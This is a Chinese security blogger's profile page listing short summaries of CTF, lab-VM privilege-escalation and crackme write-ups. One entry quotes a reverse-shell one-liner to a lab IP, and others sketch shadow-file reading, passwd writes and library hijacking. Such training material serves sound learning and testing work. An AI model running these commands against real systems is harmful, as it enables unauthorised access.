自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(48)
  • 收藏
  • 关注

原创 2024i春秋第四届长城杯网络安全大赛暨京津冀网络安全技能竞赛初赛wp-flowershop+easyre

如图所示,v8是钱的数量,strncpy从src复制三个字符给dest的数组里,最后一个元素是0,相当于字符串截断,strcmp是比较c和dest中的内容,如果相等就不会exit(0);此时末位有个read,很可能就是我们要溢出的漏洞,但是参数v4可控未知,所以往前可看check函数做了什么,显然通过分析这就是满足买了两件a商品和1件b商品的时候就可以给a2指针赋值为70,指向的就是v4,这样shop函数的buf只有10字节,但是read可以输入70字节,就达到了溢出攻击条件。

2024-09-10 10:14:07 455

原创 PHP--DCN沙箱平台实验

一. 实验目的1、掌握PHP环境的安装2、掌握Sublime编辑器的安装与使用3、了解Firefox浏览器中Hackbar插件的使用二. 实验原理PHP代码审计所需要的工具与环境三. 实验内容1、Firefox中Hackbar插件的使用2、Sublime编辑器的安装与使用3、Phpstudy的安装与使用四. 实验环境描述1、Windows 7操作系统(administrator / 123456)2、Firefox浏览器 + Hackbar插件。

2024-06-29 11:22:17 1106

原创 SSRF一篇文章实战举例全面学懂

上面这篇文章真的写的很好,是目前看过最好的将SSRF(服务端请求伪造)和Gopher协议的内容。然后这种题型,我记得在之前的文章,金砖里有个云启的练习,用的就是SSRF漏洞+file协议,呜呜呜那时候还不知道是啥。现在回首原来如此。

2024-06-29 11:12:57 1200

原创 BUUCTF-WEB(第二天)

HTML 中规定了 Character entity references,也就是通常我们说得 html实体字符,一些字符在 HTML 中拥有特殊的含义,比如小于号 (

2024-06-28 14:47:00 989

原创 BUUCTF--WEB

可以猜测,这个输入框是搜索当前数据库里的表id号应该,回显得数据就是表words里的两个字段id和data,但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显,说明有一个 或 结构,而且不直接回显flag,但作为一道题目,from一定是from flag。mb_substr($page,n,m):返回page中从第n位开始,到n+m位字符串的值。再跳转到新的页面什么也没有就结束了,所以在这个页面,我们请点击抓包,就能发现他的秘密。内联函数:将指定的函数体插入并取代每一处调用该函数的地方。

2024-06-28 14:45:47 1268

原创 全国职业院校技能大赛信息安全管理与评估--内存取证专项训练

*链接:https://pan.baidu.com/s/1tYgIicCqJExmaMLYa3YeSA提取码:lulu ******1、从内存中获取到用户admin的密码并且破解密码,以Flag{admin,password} 形式提交(密码为 6 位);****

2024-06-25 09:34:23 904

原创 2023第二届陇剑杯网络安全大赛 预选赛复盘学到的一些经验

flask框架的session是存储在客户端的,那么就需要解决session是否会被恶意纂改的问题,而flask通过一个secret_key,也就是密钥对数据进行签名来防止session被纂改。就比如在Cyberchef解密wireshark中AES加密后的流量时,要复制原始数据,再在Cyberchef中选择From Hex的Auto,后AES Decrypto,最后还要Gunzip。发现是BitLocker加密的磁盘,但是给了内存镜像,直接尝试。查看Nginx中的访问日志,的包,所以只需要过滤。

2024-06-25 09:29:40 406

原创 2023年SWPU NSS 秋季招新赛 (校外赛道)-没做出来的writeup

第一个点,就是绕过第二个if,这里直接变量覆盖即可,当然GET和POST都发送wq是不行的,在POST中发送pucky即可。在进入unserialize之后,__wakeup()会进行赋值,如果molly===yuki那么即可得到flag。看来我们需要让wq等于二仙桥来进入第一个if语句,然后再绕过第二个if语句,进行反序列化。然后在反序列化的时候采取引用绕过的方式,exp如下。这题没啥可说了,反序列化之前也专门练过了。hint有提示备份文件,直接访问。看这个大佬的手工注入,nb呀。这个 dll 文件中。

2024-06-25 09:29:06 975

原创 uvalde-bash提权

VM网络不通也没法改密码进去,只能下个VirtualBox和VMware互通了但这也不行,看来只能使用端口映射了。

2024-06-22 12:00:00 332

原创 visions-软链接提权

把它复制到windows的world里,图片格式–>矫正–>图片矫正选项–>对比度-56%,就能看到账户密码。可以看到home目录下还有好多其他用户,这里脑洞较为大,还得回到那张图片white.png。使用上面的方法,换个思路,读取root的shadow 文件,然后进行爆破。可以识别的hash,然后进行爆破,得到密码是invisible。将私钥复制出来编辑到id_rsa,这登录还需要密码,我们使用。页面只有个white.png空白图片,猜测是图片隐写。读取到root的私钥,获得第二个flag。

2024-06-22 12:00:00 446

原创 tron-passwd写入提权

由substitute单词翻译是代替可以知道,这是简单的替换密码。替换格式也表明了明文(plaintext)密文(ciphertext),就是把26字母倒叙替换,很容易写脚本。下载知名豌豆扫描工具linpeas发现passwd 有写入权限,那么我们可以直接写入一个root权限的用户或者更改他的账号密码。一长串的进行base64解码。再进行brainfuck解码得到。猜测账户就是player。

2024-06-22 08:00:00 319

原创 translator-sudo-l

这个是google的shell下翻译工具,所以google需要科学上网,我们在后面加上了-x代理,成功读取到shadow文件。也可以通过https://www.dcode.fr/cipher-identifier 发现是使用atbash编码。利用trans 进行提权,命令介绍:https://www.jianshu.com/p/da570df21ae8。sh -i >& /dev/tcp/ 192.168.44.128 / 9001 0>&1不行。也可以通过如下命令直接提权到root,反正我是不成功。

2024-06-21 12:00:00 540

原创 thewall-文件包含-CAP_DAC_READ_SEARCH

由于这是本地kali生成的公钥和私钥对,所以把公钥上传到靶机的/home/john/.ssh/authorized_keys就可以实现免密登录。我们在/tmp/下创建一个id_rsa.pub,然后使用exiftool将“id rsa.pub”复制到“authorized_key”中。这里扫描出来了一个文件包含名字的文件,尝试对其进行fuzz 参数。接下来去包含这个文件,如下说明写入成功http://192.168.18.238/a.php。读取系统上的任何文件,无论其权限如何。搜索属于用户组的文件。

2024-06-21 08:00:00 910

原创 suuk-s.php.jpg-python 库劫持

做virtualBox的端口映射吧。

2024-06-20 19:59:51 685

原创 oliva-bruteforce-luks

cap_dac_read_search=eip”是指Linux操作系统中与文件访问权限相关的概念。“cap_dac”代表“任意访问能力”,指的是基于文件所有者、组和其他用户的权限。下面我们尝试使用nmap 打开如下的文件,获取mysql的账号密码,提示说是root的账号密码,尝试登录并不是。打开后文件是在这个路径下创建的 /dev/mapper/olive_img,然后我们可以mount 命令挂载该文件。命令是在 Linux 系统中用于查看文件的特殊权限(capabilities)的工具。

2024-06-20 19:04:42 335

原创 jabita-python库劫持提权-suid

实战中,如果机器不出网,我们可以修改该脚本的内容,让它可以使用 SUID 执行 bash。或者直接创建一个root权限的账号。查看这个文件为root 权限,该脚本导入了wild 模块,执行后调用first()方法,输出一个hello。我们对改文件具有修改的权限,因此可以尝试python库劫持进行提取。那么接下来我们可以使用python反弹一个shell,代码如下。然后去这个网站搜索相关命令getshell,,,awk。我们搜索该模块,查看模块内容如下。

2024-06-18 17:51:22 306

原创 gigachad - suid

google搜图,谷歌上找到了这个地方叫maidens tower(处女塔)尝试使用这个地方名作为密码登录ssh 居然真成功了。这有一个 s-nail 文件,查看漏洞库发现低于 14.8.16 的版本存在漏洞。访问http://192.168.44.138//kingchad.html是一张带字的图,翻译。很奇怪,扫描到什么就会出现什么,访问都是同一堆字符。get出来,解压出来,得到用户名chad。访问首页,右键检查源码,解码后没啥用。密码:maidenstower。开放了21,22,80。

2024-06-18 17:48:23 449

原创 driftingblues9 - 溢出ASLR(内存地址随机化机制)

ASLR是一种针对缓冲区溢出的安全保护技术,通过对堆、栈、共享库映射等线性区布局的随机化,通过增加攻击者预测目的地址的难度,防止攻击者直接定位攻击代码位置,达到阻止溢出攻击的目的。之后,我检查了 esp 寄存器,并由于小端字节序而用相反顺序的esp地址(由于此时esp地址存储的是下一跳地址,所以还有一种方法二,这个地址话可以填成jmp esp指令的地址(但是,目标上的 ASLR 已启用,如果没有 root 权限,我们无法禁用它。在windows中使用此技术后,杀死进程后重新开启,地址不换,重启才会改变。

2024-06-18 17:47:33 1479

原创 计算子网掩码

要确定哪些主机必须通过路由器才能与主机129.23.144.16进行通信,我们需要知道这些主机是否位于不同的子网中。根据计算,只有主机C(129.23.127.222)不在网络129.23.128.0/18(子网掩码为255.255.192.0)中,因此必须通过路由器才能与主机129.23.144.16通信。我们需要检查每个主机的IP地址是否在网络地址129.23.128.0 和广播地址129.23.191.255 之间。广播地址是所有主机位地址部分都为 1 的地址。电话:129.23.148.127。

2024-06-17 13:51:34 528

原创 Comingsoon-phtml

刚开始没有IP单用户修改密码也需要输入用户密码,不能改/boot/grub/grub.cfg配置文件下看了wp,才知道root用户密码ToyStory3,进去后也没有dhclient命令获取ip只能换一种方式,编辑vim /etc/network/interface。

2024-06-17 10:42:35 430

原创 bah-host碰撞-pspy+sheallinabox

程序中的/devel将由用户root调用目标机器的/tmp/dev。下载得到数据库的用户密码http://192.168.44.141/core/config/databases.yml。但是登陆时候确是404http://192.168.44.141/index.php/login。kali上监听,访问http://party.bah.hmv/devel/即可!重新安装漏洞http://192.168.44.141/install。访问80发现是qdPMcms的网站,直接searchsploit。

2024-06-17 10:39:35 314

原创 2024高校网络安全管理运维赛题目--复现+题目+wp

官方writeup集思广益比较好的备份。

2024-06-11 15:14:16 872 2

原创 quick3-hydra

kali和quick3都设置NAT模式。

2024-04-22 17:10:00 429

原创 Linux安全运维--一篇文章全部搞懂iptables

netfilter/iptables(简称为iptables)组成Linux平台下的包过滤防火墙,与大多数的Linux软件一样,这个包过滤防火墙是免费的,它可以代替昂贵的商业防火墙解决方案,完成封包过滤、封包重定向和网络地址转换(NAT)等功能。

2024-03-08 13:27:08 1379

原创 各个类linux服务器安装docker教程

由于开始经常使用docker搭建环境了,但是的docker在不同的机器上安装总是会遇到许多问题,因此呢,一下决定总结一些docker环境的安装过程。

2024-03-08 13:23:30 505

原创 HUAWEI-5GStar(单站命令配置)

当前中国5G进入规模建设阶段,5G应用型人才需求激增。但5G应用型人才培养普遍缺乏设备环境、缺少实践操作机会。如何实现5G应用型人才培养与行业用人需求的高效衔接,成为业界共同的难题。华为推出的“5GStar”超仿真训练系统,搭载华为5G基站技术,高度还原现网业务流程,有效降低人才培养的设备及维护投入,实现“所学即所用”:模拟真实5G业务场景:系统利用华为5G基站技术同源开发,基于主流行业应用,真实模拟5G业务场景。

2024-03-07 21:14:40 1340

原创 HUAWEI-5GStar(全局设备配置)

当前中国5G进入规模建设阶段,5G应用型人才需求激增。但5G应用型人才培养普遍缺乏设备环境、缺少实践操作机会。如何实现5G应用型人才培养与行业用人需求的高效衔接,成为业界共同的难题。华为推出的“5GStar”超仿真训练系统,搭载华为5G基站技术,高度还原现网业务流程,有效降低人才培养的设备及维护投入,实现“所学即所用”:模拟真实5G业务场景:系统利用华为5G基站技术同源开发,基于主流行业应用,真实模拟5G业务场景。

2024-03-07 21:14:12 460 1

原创 站库分离技术--反向代理技术-雷池云WAF-给自己搭建一个安全点的网站

Ubuntu 系统的默认用户名是 ubuntu,并在安装过程中默认不设置 root 账户和密码。您如有需要,可在设置中开启允许 root 用户登录。docker链接本地的数据库主机用host.docker.internal。用docker下载的mysql则用数据库ip进行连接。wordpress网站后台这里设置不带端口。#进入mysql数据库–123456。#设置mysql允许访问。以后记得备份这两个目录哟。

2024-03-06 18:01:05 1836 1

原创 010Editor汉化版+下载+注册码+模板bug

是因为安装的Chrome插件造成的问题,关闭插件即可。最后我上传了资源,提示一直–csdn资源上传中断。去手动下载版本较低的模板文件。希望对大家有所帮助!

2024-03-06 14:25:58 6462 3

原创 逆向学习crackme160题-016-fty_crkme3 的 weite up

第一部分:判定输入字符串长度必须在0x9~0xB之间,然后后面的算法计算大概意思差不多,所以我们后面只用字符串长度为0x9时举例。解释:这就是加密算法的主要部分了,主要的流程就是把输入正确长度的字符串进行纯数字的提取,将这些纯数字字符串以十六进制保存在esi中,然后依次把这些纯数字取单个进行七次方的运算,每次得到的运算结果都要累加起来,最后储存在edi中。第一部分是堆栈平衡,第二部分主要是判断输入的是否为空,第三部分主要就是确用户数输入的只能是0-9的数字或者是字符“-”。

2024-03-05 21:55:00 174

原创 逆向学习crackme160题-015-Brad Soblesky.1 的 write up

解释:其实这题和简单,可以看的出来主要做的就会用户输入的string2和内置的string对比。首先我们拖入32位IDA进行分析,根据运行的错误信息的关键提示字符,可以知道下面标黄的可能一个是错误提示,一个是正确提示。选中标黄字符串,右键选择以十六进制转换成ASCII形式即可显示出字符串来。应用:C51是大端存储;socket编程中网络字节序一般是大端存储。socket编程中网络字节序一般是大端存储。应用:x86结构、ARM和DSP都是小端存储。

2024-03-05 21:31:15 79

原创 Python爬虫实战-中国最低气温排行

爬虫实战-中国最低气温排行

2024-03-03 13:01:24 220

原创 逆向学习crackme160题-014-Splish 的 write up

破解烦人的Nag弹窗,逆向算法,编写注册机

2024-03-03 12:40:30 137

原创 逆向学习crackme160题-013-Acid burn 的 write up

破解烦人的NAG弹窗,逆向学习crackme160题-013-Acid burn 的 write up

2023-11-19 14:12:10 555

原创 逆向学习crackme160题-012-ACG-crcme1 的 write up

逆向学习crackme160题-012-ACG-crcme1 的 write up

2023-09-21 14:46:28 861

原创 linux安全基础入门

以下时间均来自DCN沙箱平台,作为安全入门学习,如有侵权联系删除!

2023-08-02 19:42:03 467 1

原创 逆向学习crackme160题-011-wocy.1 的 write up

我是。

2023-07-10 15:44:15 702 1

原创 逆向学习crackme160题-010-ceycey 的 write up

刚打开软件输入框提示我们的是Write it here!!

2023-07-07 16:15:15 628 1

原创 逆向学习crackme160题-009-Boonz-KeygenMe#1 的 write up

首先我们输入一个用户名密码之后按check,会在密码的输入框弹出“Name must be 4 - 50 chars long!”,告诉我们用户名的长度必须为4-50个字节,如下图:然后再次尝试如下图,再看程序的有关信息:这些出现的字符串暂时都可以当作提示字符串便于后面寻找。

2023-07-06 14:28:51 633 1

原创 逆向学习crackme160题-008-Afkayas.1 的 write up

解释:这是一个叫我们输入用户名和密码的问题,首先我们默认假设输入的是他给出的字符串,然后点击OK,就会弹出一个提示框如上图,这些都可以看作关键的提示字符串。

2023-06-26 17:54:27 506 1

010EditorWin64Portable14.0-二次修整版.rar

010Editor Professional 是一个十六进制编辑器,它可以用来查看和编辑二进制文件。如果您有一段话需要在010Editor中接受,您可以先将这段话保存为一个文本文件,然后打开010Editor 并将该文本文件导入到编辑器中。您可以使用010 Editor的文件打开功能,选择该文本文件并加载它,然后您就可以在编辑器中查看和编辑该文件的内容了。请注意,010Editor主要用于编辑二进制文件,而不是文本文件,因此在编辑器中可能会显示一些奇怪的字符或符号。 010Editor软件的功能特色主要包括以下几点: 专业的十六进制编辑器:支持编辑源码文本和二进制文件,能够处理各种大小的文件,并且对所有编辑操作都可以无限制地撤消和重做。 二进制模板技术:通过独特的二进制模板技术,用户可以更好地理解并编辑二进制文件格式。 强大的分析工具:提供了文件逐字节差异分析、直方图数据可视化、计算校验哈希算法等功能,帮助用户分析和编辑文本和二进制数据。 脚本自动化执行:支持使用类似于C/C++的语法脚本自动执行编辑操作,方便用户进行批量处理和操作。 总之,010Editor软件的功能特色包括专业的

2024-03-06

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除